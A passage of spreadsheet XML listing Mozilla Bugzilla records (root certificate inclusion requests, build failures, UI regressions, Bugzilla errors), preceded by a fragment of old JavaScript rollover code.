action[m] = new Image() }
action[0].src = bred.gif
action[1].src = br1.gif
action[2].src = br2.gif
action[3].src = br3.gif
action[4].src = bblue.gif
action[5].src = 3t.gif
action[6].src = 3tpu.gif
action[7].src = 3tlog.gif
action[8].src = 3tbet.gif }
}
function buttonswitchon1() {
if (document.images) {
setTimeout('document.button1.src = action[1].src'50)
setTimeout('document.button1.src = action[2].src'100)
setTimeout('document.button1.src = action[3].src'150)
setTimeout('document.button1.src = action[4].src'200) }}
// end action-mouseover code 
// end comment tag --&gt;
</t>
  </si>
  <si>
    <t>hypothraxer</t>
  </si>
  <si>
    <t>NSS-406796</t>
  </si>
  <si>
    <t>Enable GlobalSign Root for EV</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 .NET CLR 1.0.3705 .NET CLR 1.1.4322 Media Center PC 4.0 InfoPath.1 .NET CLR 2.0.50727)
Build Identifier: 
* Name of the CA certificate
(1) GlobalSign Root CA  (Currently in the NSS but due to be refreshed (Bug 406794) by GlobalSign Root CA.  The latter expires in 2028 rather than 2014.
(2) GlobalSign Root CA - R2
* Published CP/CPS.
The GlobalSign CPS (Currently Version 5.6) is located in our repository http://www.globalsign.com/repository/index.htm 
* Published report describing how you're meeting the audit requirements of secton J of the EV guidelines.
GlobalSign is currently covered by the EV WebTrust readiness audit performed by Deloitte and approved by Microsoft for inclusion within IE.   This is not a public report.   The next audit for EV is due in April 2008 at the same point as the WebTrust for CA Audit.  The latter report is here:- 
https://cert.webtrust.org/SealFile?seal=637&amp;file=pdf 
* EV OID(s) for the CA certificate in question.
1.3.6.1.4.1.4146.1.1
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>steve.roylance</t>
  </si>
  <si>
    <t>MARKETING-350021</t>
  </si>
  <si>
    <t>Website plagiarised Thunderbird and Firefox logos to propose their own services</t>
  </si>
  <si>
    <t>http://www.webtuga.com/  a portuguese site plagiarised our logos in their new redesign.
it looks like a general computing community site though there don't seem to be a company behind.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-331209</t>
  </si>
  <si>
    <t>[Meta] 0.6 Release</t>
  </si>
  <si>
    <t>CORE-288956</t>
  </si>
  <si>
    <t>Update casetable.h to Unicode 4.1.0</t>
  </si>
  <si>
    <t>I'm not going to be able to finish bug 210501 before the 1.8b2 freeze so this
is for updating intl/unicharutils/src/casetable.h to the BMP part of Unicode
4.1.0 with no code changes.</t>
  </si>
  <si>
    <t>FIREFOX-329792</t>
  </si>
  <si>
    <t>Remove code for old tag-style folder selector in Bookmark Properties dialog (which needlessly set font size)</t>
  </si>
  <si>
    <t>The properties window for Places sets the font size to 9pt which totally goes against the point of having standard GUI elements and sizes. I can't even see anything on the dialog that would benefit from a larger-that-I've-set-my-OS-too font size.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-517417</t>
  </si>
  <si>
    <t>access violation: while compiling xulrunner tries to test for Mercurial repositories above its build dir</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/4.3 Linux) KHTML/4.3.1 (like Gecko)
Build Identifier: xulrunner-1.9.1.3
I tried to build xulrunner on my Gentoo which creates a sandbox for it in /var/tmp/portage/net-libs/xulrunner-1.9.1.3/work/ 
Write access outside this sandbox is not allowed (else it gets an access violation). 
Now I have a Mercurial repository in /var (to version some important files like my mpd playlists) and xulrunners check for a Mercurial repository seems to propagate outside the sandbox and try to write in my /var/.hg dir: 
...
F: open_wr
S: deny   
P: /var/.hg/wlock
A: /var/.hg/wlock
R: /var/.hg/wlock
C: /usr/bin/python2.6 /usr/bin/hg identify 
...
F: open_wr
S: deny   
P: /var/nxTE_D
A: /var/nxTE_D
R: /var/nxTE_D
C: /usr/bin/python2.6 /usr/bin/hg identify 
Reproducible: Always
Expected Results:  
The check for the hg repo shouldn't propagate outside the build dir to avoid that sandbox violation. 
I verified that the hg repo was the reason by moving it away before building. When there wasn't a hg repo in /var/ building worked without problems. 
Additional information is available in the according Gentoo bug: http://bugs.gentoo.org/show_bug.cgi?id=284673</t>
  </si>
  <si>
    <t>arne_bab</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-450270</t>
  </si>
  <si>
    <t>NewAPI: Add modal windows support for Qt</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: 
Add support for handling modal windows in the Qt part of the New Embedding API. This is needed for making prompts work correctly. Will add patch shortly.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>pelle.johnsen</t>
  </si>
  <si>
    <t>CORE-25584</t>
  </si>
  <si>
    <t>Leaking nsIFiles in nsDirectoryService::Set()</t>
  </si>
  <si>
    <t>Leaking nsIFile in nsDirectoryService::Set().</t>
  </si>
  <si>
    <t>BUGZILLA-427449</t>
  </si>
  <si>
    <t>Add foreign key constraints for versions table and milestones table</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.10) Gecko/20070510 Fedora/1.5.0.10-6.fc6 Firefox/1.5.0.10
Build Identifier: 
Add foreign key information for versions table and milestones table
in Bugzilla/DB/Schema.pm file.
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-217242</t>
  </si>
  <si>
    <t>CheckIfVotedConfirmed tripped Table 'fielddefs' was not locked with LOCK TABLES [for statement ``SELECT fieldid  FROM fielddefs WHERE name = 'bug_status''']</t>
  </si>
  <si>
    <t>DBD::mysql::st execute failed: Table 'fielddefs' was not locked with LOCK TABLES
[for statement ``SELECT fieldid FROM fielddefs WHERE name = 'bug_status''']) at
Bugzilla/DB.pm line 66
        Bugzilla::DB::SendSQL('SELECT fieldid FROM fielddefs WHERE name =
\'bug_status\'') called at globals.pl line 151
        main::GetFieldID('bug_status') called at CGI.pl line 329
        main::CheckIfVotedConfirmed(14071875) called at
/var/www/html/bz92594/votes.cgi line 350
        main::record_votes() called at /var/www/html/bz92594/votes.cgi line 81
[Mon Aug 25 11:32:40 2003] [error] [client 68.84.41.7] Premature end of script
headers: /var/www/html/bz92594/votes.cgi</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-372924</t>
  </si>
  <si>
    <t>[mk] migration wizard string change</t>
  </si>
  <si>
    <t>We want to change the description of the homepage in the migration wizard
http://lxr.mozilla.org/l10n-mozilla1.8/source/mk/other-licenses/branding/firefox/brand.properties
It should look like http://lxr.mozilla.org/mozilla/source/other-licenses/branding/firefox/locales/en-US/brand.properties
The corresponding patch is the en-US part in https://bugzilla.mozilla.org/attachment.cgi?id=257411&amp;action=diff#mozilla/other-licenses/branding/firefox/locales/en-US/brand.properties_sec1
Current String in English for homePageSingleStartMain:
Firefox Start a fast search page with search results by XXX
New String:
Firefox Start a fast home page with built-in search
Please create the patch as 
cvs -z3 diff -u mk/other-licenses/branding/firefox/brand.properties
from the l10n directory we'll try to grab those patches together and land them with the en-US change.
See bug 372409 and bug 371309 for more information.</t>
  </si>
  <si>
    <t>CORE-310124</t>
  </si>
  <si>
    <t>Double border is incorrectly compressed when rendered regression.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
In Firefox 1.0.7 a double border was given its correct spacing. In Firefox
1.5b1 this is not the case. The provided URL demonstrates this problem where a
double border is compressed into a single line for certain screen resizings.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.bolinfest.com/mozilla/missing_border.html
2. Click the link to show the page at the specified size
Actual Results:  
Look at the 4th border and note it is compressed.
Expected Results:  
Should have been a double border with a visible space between the two lines.</t>
  </si>
  <si>
    <t>mbolin</t>
  </si>
  <si>
    <t>NSS-287495</t>
  </si>
  <si>
    <t>Please add Go Daddy root certs to NSS</t>
  </si>
  <si>
    <t>Per my comments in bug 284677 I have approved two new root CA certs for Go Daddy
for inclusion in Mozilla-related products. Please include these new certs in NSS
and update the appropriate NSS CVS tag so that the patch will be properly pulled
by Firefox Thunderbird etc. nightly builds.
The certs are available in the URL referenced in this bug direct lines are also
in the Go Daddy entry in .
I've verified SHA-1 fingerprints with a Go Daddy representative.
Marking this patch as blocking bug 284677.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-402585</t>
  </si>
  <si>
    <t>include old Firefox tinderboxen in new graph server</t>
  </si>
  <si>
    <t>Some of the old Firefox tinderboxen (f.e. bl-bldlnx03) that appear on the Firefox tinderbox page (http://tinderbox.mozilla.org/showbuilds.cgi?tree=Firefox) don't show up in the new graph server (http://graphs.mozilla.org/).
The new graph server has some capabilities that the old one doesn't including the crucial capability to see a graph between two timepoints where the second timepoint isn't now so it would be good to be able to see the performance graphs for those tinderboxen in the new graph server.</t>
  </si>
  <si>
    <t>FIREFOX-421763</t>
  </si>
  <si>
    <t>bookmarks import and restore only allow files named .html and .json</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b5pre) Gecko/2008030804 Minefield/3.0b5pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b5pre) Gecko/2008030804 Minefield/3.0b5pre
When you choose to restore bookmarks from a bookmarks backup it displays and lets you to select only files that have a particular extension html.
You should be able to choose to display and select files that are not html. Although naming the files *.html is the normal way and a good default to have why shouldn't you be able to name your backups however you'd like?
--
Reproducible: Always
Steps to Reproduce:
1.Open the Library via Organize Bookmarks in the Bookmarks menu
2.From Import and Backup choose Restore --&gt; Choose file.
3.A dialogue pops up and it (sensibly) displays files with the suffix .html in selected directories
4.There is a box that allows you to choose what types of file are shown but it less sensibly allows only one choice html.
Actual Results:  
You can't choose your bookmarks backup if it is not named *.html
Expected Results:  
Allow you to choose a backup with any kind of name or suffix.
The workaround is to rename your files as needed.</t>
  </si>
  <si>
    <t>fahlmanc_ca</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-201356</t>
  </si>
  <si>
    <t>Make page-loader test support XML content</t>
  </si>
  <si>
    <t>I've been working on this and have a patch that will make things work with XML
documents. Will attach patch soon.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-471145</t>
  </si>
  <si>
    <t>Disable and remove remora-3.5.php5stage.mozilla.com</t>
  </si>
  <si>
    <t>Got an email about this showing up in search results on google.  This should be disabled.
---
Hi Mike!
I'm emailing you because you seem to be responsible for AMO or at least one of the team. It seems that there is an old dev copy of AMO online which is indexed by Google at http://remora-3.5.php5stage.mozilla.com/.
A quick search for Adblock Plus returns an old version at the dev address compared to the official site:
http://remora-3.5.php5stage.mozilla.com/en-US/firefox/addon/1865
https://addons.mozilla.org/en-US/firefox/addon/1865.
Personally I think this should be removed from the Internet for several reasons not the least that people could find this site instead of the official AMO and download some old copy or try to contact someone by some old email address or such.
However I wish you a very merry Christmas!
Best
Nisse Nordin</t>
  </si>
  <si>
    <t>CORE-219180</t>
  </si>
  <si>
    <t>Limited-privilege extensions (was: security on Extensions is seemingly non-existent)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Build Identifier: 
Information on limitations of extensions is not readily available. It would 
seem that extensions can at the current time access various parts of the 
system without control. It would be appropriate to include a rights system to 
enable the user to control rights available to the extension. Extensions which 
do not require access to the system would not be given access to that by the 
user (eg. a tab-enhancement extension) whilst other extensions could be given 
rights (eg. an extension to enhance local file browsing).
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>z0rg0n</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-416492</t>
  </si>
  <si>
    <t>Ensure stats dashboard handles all use-cases gracefully</t>
  </si>
  <si>
    <t>Need to make sure that the dashboard looks good for add-ons that were just made and have no downloads/data as well as for add-ons in between and add-ons with tons of data.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-478603</t>
  </si>
  <si>
    <t>intermittent orange on Windows mozilla-central talos Ts and Tdhtml tests (failed to initialize browser)</t>
  </si>
  <si>
    <t>The tree is currently closed due to Windows talos orange.
My best guess for wtf that means is the way that starting with qm-pvista-trunk03 at 2009/02/08 18:12:12 then becoming nearly continuous with 03 the 9th and with 02 joining in increasingly often the 9th and through the rest of the week (ignored by everyone all week long) we've been having FAIL: Busted: tdhtml
FAIL: failed to initialize browser.
During that entire time qm-pvista-trunk01 has been continuously green except for one non-tdhtml failure which would certainly seem to indicate that it's box trouble rather than code trouble.
I think we're going to reopen since whoever anonymously closed the tree didn't leave any indication of having noticed that it was only two of the three much less that it had been ignored all week long but it's still pretty critical since it leaves us with just one.</t>
  </si>
  <si>
    <t>JSS-500138</t>
  </si>
  <si>
    <t>please fix some of the misspellings in JSS</t>
  </si>
  <si>
    <t>Created attachment 384829
fix typos
This list was generated using the following process:
1. find . -type f|grep -v CVS &gt; /tmp/jss-list
&gt; build file list jss-list
2. cat /tmp/jss-list |xargs -n1 grep . |sort &gt; /tmp/jss-list-words
&gt; build line list
3. uniq -c /tmp/jss-list-words &gt; /tmp/jss-list-words-count
&gt; get rid of duplicates but weight them - the -c part is mildly painful later
4. /tmp/jss-list-words-count /tmp/jss-list-words-count.orig
&gt; save original
5. vi ~/.aspell.en.pws aspell -c /tmp/jss-list-words-count
&gt; the first command here is used to remove words that you accidentally add.
 use :q to quit
 use /foo to find foo
 use dd to remove the line you're on
 use :wq to save changes
&gt; the second command here builds the ignore list and lets you build your correction list
 press and hold a to move forward
 press a number or use r to define a replacement
 press x when you need to undo something
6.  to repeat 5 (you spend a lot of time between 5 and 6)
7. diff -U0 /tmp/jss-list-words-count{.orig} &gt; /tmp/jss-diff
&gt; build the replacement set
8. perl -pi.0 -e 's/(^[-+]) {6}\d+ /$1/' /tmp/jss-diff 
&gt; undo -c from step 3
9. cat /tmp/jss-list|xargs -n1 patch -i /tmp/jss-diff
patch the tree :)
note that some things can't be found this way e.g. when JSS uses a word which exists in the dictionary but is not correct.
I generated my change set based on the xref on konigsberg and then cvs updated. this means that any spelling errors introduced after that point will not be fixed by my patch even though the versions indicate tip.</t>
  </si>
  <si>
    <t>CORE-177313</t>
  </si>
  <si>
    <t>Header/Footer settings not saved</t>
  </si>
  <si>
    <t>I am using moz 1.1 [Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.1)
Gecko/20020827] under solaris 2.8.  The header/footer setting set in the Page
Setup dialog (see 66713) are not saved when I quit the browser process and
restart it later.</t>
  </si>
  <si>
    <t>gmcgrath</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-934001</t>
  </si>
  <si>
    <t>Theme and Visual Design</t>
  </si>
  <si>
    <t>ImageView's setImageBitmap is evil</t>
  </si>
  <si>
    <t>Calling setImageBitmap(null) creates BitmapDrawables BitmapDrawable$State and associated Paint objects. That's so much memory for not showing anything! :O</t>
  </si>
  <si>
    <t>sriram.mozilla</t>
  </si>
  <si>
    <t>TESTOPIA-341208</t>
  </si>
  <si>
    <t>tr_new_plan.cgi - not able to edit product version</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Hello 
I installed the beta version of testopia and when running tr_new_plan.cgi to create a new test plan I am not able to edit product version it shows blank and is uneditable even though there are product versions for all products. And then I get the following error on saving: 
Undef to trick_taint at Bugzilla/Util.pm line 63 
Bugzilla::Util::trick_taint('undef') called at tr_new_plan.cgi line 63 
Can you please help asap as I upgraded the production instance of test runner to testopia and don't wish to go back now. 
Thanks 
Vivek
Reproducible: Always
Steps to Reproduce:
1.Login
2.Click to create a test plan
3.Not able to edit product version and then save the test plan
Actual Results:  
Undef to trick_taint at Bugzilla/Util.pm line 63 
Bugzilla::Util::trick_taint('undef') called at tr_new_plan.cgi line 63 
Expected Results:  
It should have saved the test plan.</t>
  </si>
  <si>
    <t>NSPR-307573</t>
  </si>
  <si>
    <t>prpollml test failures</t>
  </si>
  <si>
    <t>prpollml test fails on HP-UX and Solaris.
Test fails immediately with:
BEGIN TEST: prpollml
PR_NewTCPSocket failed
END TEST: prpollml
Occurs regardless of OPT/DBG or 32/64 bit.</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-776214</t>
  </si>
  <si>
    <t>Accessing the Albanian locale result in Internal Server Error</t>
  </si>
  <si>
    <t>User Agent: Mozilla/5.0 (Macintosh Intel Mac OS X 10.6 rv:17.0) Gecko/17.0 Firefox/17.0
Build ID: 20120719030543
Steps to reproduce:
Went to: https://developer-new.mozilla.org/sq/ (Albanian home page)
Actual results:
Got an Internal Server Error
Expected results:
Should have been redirected to the en-US home page (as it is a valid locale). Or at least to a regular 404 page (usual behavior w/ a non-valid locale string).</t>
  </si>
  <si>
    <t>NSS-496305</t>
  </si>
  <si>
    <t>Results from dbtest.sh are not reported in output.log.</t>
  </si>
  <si>
    <t>Ivan found out that some test are reported only in results.html and not in output.log.
When I looked to testing scripts I found out that all results from dbtest.sh are redirected to dbtest.log file with comment we don't want all the errormessages in the output.log otherwise we can't tell what's a real error.
There are some negative tests and output contains messages with ERROR stings but while our tests searches for string FAIL it shouldn't be a problem. When report is redirected to dbtest.log it is possible that some failures are undetected so I suggest remove this forwarding and keep output from dbtest.sh in output.log.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-263619</t>
  </si>
  <si>
    <t>Add Flash Click to View extension</t>
  </si>
  <si>
    <t>Please add the FlashBlock extension which I will attach to this bug forthwith.
It is based on the existing flashblock xpi but modified to work with Firefox's
extension manager. So install and uninstall work now.</t>
  </si>
  <si>
    <t>lorenzo</t>
  </si>
  <si>
    <t>CORE-168658</t>
  </si>
  <si>
    <t>[DAP] External Download Manager stopped downloading after making on the download URL</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.2a) Gecko/20020910
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.2a) Gecko/20020910
Using Download Accelerator Pro v5.3 (DAP)from www.speedbit.com which is
intregrated with Mozilla. This done by copying dapop.dll to Mozilla's plugins
directory and renaming it to npdap.dll. (See at www.Speedbit.com at the FAQ's
the last FAQ-line)
In Mozilla Preferences is the Download set to Don't open anything.
Everytime I going to Download something with DAP starts up immediatly a message
apaers on the Browser screen with the message that DAP was starting up. It than
searched for the download-links and article which you want to download and
stops after that. Mozilla is than still functional but for savekeeping I let
DAP running alone.
It appears also that the same download with Mozilla and Internet explorer that
the download speed with Internet Explorer is always higher than with Mozilla.
To download specific article I must stop the Mozilla-browser and start the
download with DAP again and the download of the specific article begins and
end's normally.
During the whole download it's possible to startup Mozilla and work with it as
normally.
Reproducible: Always
Steps to Reproduce:
1. DAP starting up the download.
2. On Mozilla Browser screen a DAP-message appears that the download is started.
3. DAP search for the download-links.
4. After found the links the whole download breaks off and try's.
5. Closedown Mozilla.
6. Restart the download-link in DAP's download scheduler.
7. The download begins normally and I receive the article I want.
8. After the download you can restart-up Mozilla again.
Actual Results:  
I've got a perfect download. But before I begin to download I must bookmark the
URL because I must shutdown everytime Mozilla or I lose the URL.
Expected Results:  
1. Beter information in de HELP-manual concerning using external 3th party
Download-managers
2. Better explanation of the three download-settings in Prefernces\Download.
3. That a 3th party can functionnon Mozilla.</t>
  </si>
  <si>
    <t>fblemans</t>
  </si>
  <si>
    <t>CORE-386496</t>
  </si>
  <si>
    <t>Clicking on link in designMode document does follow that link now</t>
  </si>
  <si>
    <t>See testcase when clicking on the link you should not be going to google.com.
I think this regressed with bug 237964.</t>
  </si>
  <si>
    <t>THUNDERBIRD-529299</t>
  </si>
  <si>
    <t>Presence of accounts using Global Inbox in Folder Location list is confusing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1.4) Gecko/20091027 Fedora/3.5.4-1.fc11 Firefox/3.5.4 XPCOMViewer/0.9a
Build Identifier: 
'Folder Location' gadget includes all accounts irrespective of its type and folder structure in folder pane. As a result even if a folder (Inbox/Trash) of a Global Inbox account is chosen in Folder location list Tb will fail to find any corresponding folder in folder pane and selects main account name in folder pane.
Reproducible: Always
Steps to Reproduce:
1. Configure a POP account to use Global Inbox.
2. Customize Toolbar to include Folder Location gadget.
3. Select any folder or account name of that account in Folder location list.
Actual Results:  
Tb focus on the name of default mail account in folder pane.
Expected Results:  
Either Tb will not display any of account that uses Global Inbox i.e Folder location list will mirror same folder tree structure as in folder pane.
Or By selecting any folder of Global Inbox account will select corresponding folder in Local Folders.
I'm using 
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1.4pre) Gecko/20091014 Fedora/3.0-2.8.b4.fc11 Thunderbird/3.0b4</t>
  </si>
  <si>
    <t>CALENDAR-342933</t>
  </si>
  <si>
    <t>Differentiate between tasks and events in day/week view</t>
  </si>
  <si>
    <t>In the month view tasks get a * to show that they're not events.  In the day/week view they look the same.  We should fix that.</t>
  </si>
  <si>
    <t>CORE-184159</t>
  </si>
  <si>
    <t>Hang accessing MathML page</t>
  </si>
  <si>
    <t>Linux build 2002120608
Mozilla hangs up accessing provided URL.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-294476</t>
  </si>
  <si>
    <t>Text boxes ignore keyboard on opening URL from an external app</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
With Firefox running but minimized click on a URL in another application (e.g.
Apple Mail).  The active tab in Firefox will display the correct URL but all
text boxes ignore entry.  This includes the search tool's text field and text
boxes on the URL.  Firefox must be minimized to observe this bug.
Reproducible: Always
Steps to Reproduce:
1. Open Firefox.  Minimize the window.
2. Open Apple Mail.  Find an email with a link.  Click on the link.
3. Bring Firefox back to normal then try to type in a textbox.
Actual Results:  
The textbox cannot be made active.  It doesn't matter whether the box is on the
webpage or on the toolbar (search tool for example).  Because it is not active
I can't type text in the textbox.  If more than one browser window is open and
minimized only the active (last accessed) window is affected.  All tabs in
the window are affected.
Expected Results:  
I should be able to activate any textbox and enter text.
I've observed this since Firefox 10.0.1.</t>
  </si>
  <si>
    <t>hcbowman</t>
  </si>
  <si>
    <t>CALENDAR-528540</t>
  </si>
  <si>
    <t>Adjust comm-central version numbers to distinguish builds from comm-1.9.1 and comm-central</t>
  </si>
  <si>
    <t>Created attachment 412246
comm-central patch
I think we should adjust version numbers to distinguish comm-1.9.1 and comm-central builds. This patch proposal raises the calendar version to 1.1a1pre and sets the minVersion for Thunderbird/SeaMonkey to the currently used ones.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-245114</t>
  </si>
  <si>
    <t>Nitpick: click -&gt; select in mozilla-org/html/products/thunderbird/download.html</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Minor nitpick. Click assumes the user relies on a mouse to activate links.
Users of accessiblity devices and text-only browsers will often use other
methods of activating links such as a keyboard or voice recognizition.
Index: mozilla-org/html/products/thunderbird/download.html
===================================================================
RCS file: /cvsroot/mozilla-org/html/products/thunderbird/download.htmlv
retrieving revision 1.1
diff -u -r1.1 download.html
--- mozilla-org/html/products/thunderbird/download.html	2 May 2004 23:42:26
-0000	1.1
+++ mozilla-org/html/products/thunderbird/download.html	30 May 2004 20:25:23 -0000
@@ -907 +907 @@
     You Have JavaScript Disabled.
-    Click one of the following links to start the download.
+    Select one of the following links to start the download.
       Windows
(%%THUNDERBIRD-WIN32-SIZE%%) 
       Linux
(%%THUNDERBIRD-X86LINUX-SIZE%%)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>sdaugherty</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-504549</t>
  </si>
  <si>
    <t>Upgrading contributed modules.</t>
  </si>
  <si>
    <t>Can we upgrade 
Affiliates 
CCK 
Image  
Image API 
Image Cache 
Mollom 
Upload Image
to the latest recommended versions on stage.
Thanks Paul</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-29278</t>
  </si>
  <si>
    <t>rsync cleanup</t>
  </si>
  <si>
    <t>There are couple of things that need to be cleaned up with rsync:
1) we should migrate away from rsync over cvs to using the rsyncd protocol
2) i turned on logging for rsync on both lounge and thelizard.  this should
either be turned off again or the logs should be set up for rotation.</t>
  </si>
  <si>
    <t>TOOLKIT-453442</t>
  </si>
  <si>
    <t>Secure favicon.ico request pop-ups certificate error dialog</t>
  </si>
  <si>
    <t>When requesting https:// page with incorrect certificate certificate error page and the certificate error pop-up dialog appears both.
I am testing with a secure site with invalid certificate running on localhost and with https://verisign.com. I get the correct page to add an exception. But in few seconds the dialog as described above appears too.
This is caused by https://verisign.com/favicon.ico request. When certificate error during this subsequent request is detected pipnss is trying to figure out if there were assigned external handler for cert errors. It fails because nsCOMPtr item(do_GetInterface(proxiedCallbacks)) at nsNSSSocketInfo::EnsureDocShellDependentStuffKnown fails. This getInterface proxies to nsHttpConnection::GetInterface what is correct. It successfully delegates GetInterface to mTransaction-&gt;mSecurityCallbacks which is (in this case) nsInterfaceRequestorAgg also correct. But it has assigned just mFirst member that points to FaviconLoadListener. And this class doesn't provide nsIDocShellTreeItem interface. mSecond is null.
Therefor pipnss believes there is not any external handler assigned (actually there is none) -&gt; dialog appears.
Doesn't appear in FF 3.0.1.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-467103</t>
  </si>
  <si>
    <t>MPT-VPN access for Johnathan Nightingale</t>
  </si>
  <si>
    <t>More than once now I've needed this and borrowed Gavin or someone to help answer a question that I should have been able to answer myself.  Is there anything special I need to do here or just an LDAP flag?</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-264437</t>
  </si>
  <si>
    <t>sv-SE locale missing chrome/help/firefox-toolbar.png</t>
  </si>
  <si>
    <t>The sv-SE locale is missing chrome/help/firefox-toolbar.png on the aviary branch
causing the 'make-jars.pl' build step to fail.  A sample log can be seen at:
http://tinderbox.mozilla.org/showlog.cgi?log=MozillaTest/1097791140.24384.gz&amp;fulltext=1
bsmedberg: Can you pass this on to the appropriate sv-SE assignee?</t>
  </si>
  <si>
    <t>slicedlime</t>
  </si>
  <si>
    <t>CORE-287624</t>
  </si>
  <si>
    <t>round CSS border widths to nearest pixel</t>
  </si>
  <si>
    <t>This is sort of a follup on the discussion in bug 173051 comment 17 through bug
173051 comment 23.
I think we should round CSS border widths to the nearest device pixel in the
style system so that a given border width always rounds to the same size.  The
idea here is that we're solving this problem only for borders and not for
anything else -- since:
 1) for things like widths we want to ensure that 4 * 25% is 100% not a few
pixels less and
 2) we don't want consistency of heights for things handled by (1) since that
creates gaps like in bug 173051.
roc points out that we should be rounding to device pixels not CSS pixels. 
This might be a little hard for printers given our current code.</t>
  </si>
  <si>
    <t>CORE-454435</t>
  </si>
  <si>
    <t>RefillDoubleFreeList runtime locking causes poor performance on parallel ray tracing</t>
  </si>
  <si>
    <t>I picked up vlad's parallel ray tracing demo yesterday and realized that the runtime locking issue in RefillDoubleFreeList still exists. On a multicore machine we get some performance wins using multiple threads but hardly the win we'd hope for.
Here's some suggestions Igor had:
&gt; Another suggestion is to increase the free list size for double from
&gt; the current maximum of 32 values to n*32 where n is at least 2. Yet
&gt; another possibility is to use compare-and-swap to implement lock-free
&gt; grabbing of allocation bitmap word that is used to build the
&gt; context-private list. This way the lock will be taken only when
&gt; allocating a new GC arena holding about 500 doubles.</t>
  </si>
  <si>
    <t>NSS-233493</t>
  </si>
  <si>
    <t>symkeyutil build broken on OS/2</t>
  </si>
  <si>
    <t>E:\dev\nss\tip\mozilla\security\nss\cmd\symkeyutil\OS22.45_icc_OPT.OBJ\symkeyuti
l.obj(E:/dev/nss/tip/mozilla/security/nss/cmd/symkeyutil/symkeyutil.c) : error L
NK2029: read : unresolved external
E:\dev\nss\tip\mozilla\security\nss\cmd\symkeyutil\OS22.45_icc_OPT.OBJ\symkeyuti
l.obj(E:/dev/nss/tip/mozilla/security/nss/cmd/symkeyutil/symkeyutil.c) : error L
NK2029: open : unresolved external
E:\dev\nss\tip\mozilla\security\nss\cmd\symkeyutil\OS22.45_icc_OPT.OBJ\symkeyuti
l.obj(E:/dev/nss/tip/mozilla/security/nss/cmd/symkeyutil/symkeyutil.c) : error L
NK2029: close : unresolved external
E:\dev\nss\tip\mozilla\security\nss\cmd\symkeyutil\OS22.45_icc_OPT.OBJ\symkeyuti
l.obj(E:/dev/nss/tip/mozilla/security/nss/cmd/symkeyutil/symkeyutil.c) : error L
NK2029: write : unresolved external
There were 4 errors detected
gmake.exe: *** [OS22.45_icc_OPT.OBJ/symkeyutil.exe] Error 12
The fix is to use NSPR . Patch forthcoming.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-412857</t>
  </si>
  <si>
    <t>Don't show CFBundleVersion in Sparkle update panel</t>
  </si>
  <si>
